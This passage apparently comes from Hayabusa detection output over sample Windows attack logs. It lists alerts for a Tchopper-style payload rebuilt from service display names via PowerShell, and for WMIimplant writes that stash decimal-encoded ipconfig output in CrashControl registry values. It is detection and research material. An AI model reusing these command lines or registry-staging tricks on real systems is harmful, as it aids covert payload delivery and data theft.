payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:13.660 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.098 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.113 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:15.113 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:16.552 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:18.002 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.468 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.484 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:19.484 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.926 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.942 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:20.942 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.374 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.390 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:22.390 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:53:41.099 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon 
Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.123 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48
,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,9
8,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:55.139 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 
10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | 
Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_sysmon/registry_event/registry_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 10:26:59.790 +00:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump 